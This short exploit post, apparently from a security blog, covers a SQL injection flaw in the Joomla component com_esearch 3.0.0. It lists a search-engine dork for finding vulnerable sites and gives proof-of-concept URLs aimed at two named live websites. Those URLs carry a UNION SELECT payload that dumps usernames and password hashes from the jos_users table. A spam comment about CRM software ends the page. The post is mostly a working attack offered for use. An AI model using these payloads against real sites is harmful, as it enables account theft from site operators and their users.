TNR Enhanced Joomla Search SQL Injection Vulnerability

[o] TNR Enhanced Joomla Search SQL Injection Vulnerability

Software : com_esearch ver 3.0.0
Vendor : http://www.tnrjoomla.com/
Dork : "com_esearch"
Author : NoGe


[o] Exploit

http://localhost/[path]/index.php?search=NoGe&option=com_esearch&searchId=[SQLi]


[o] PoC

http://www.visitdetroit.com/index.php?search=NoGe&option=com_esearch&searchId=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users--
http://www.tnrjoomla.com/index.php?search=NoGe&option=com_esearch&searchId=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users--

3 Responses so far.

  1. Tony Raz says:

    If you’re interested in using Microsoft crm software for your business then this company can really help you out. They have the knowledge and know how to make your business grow.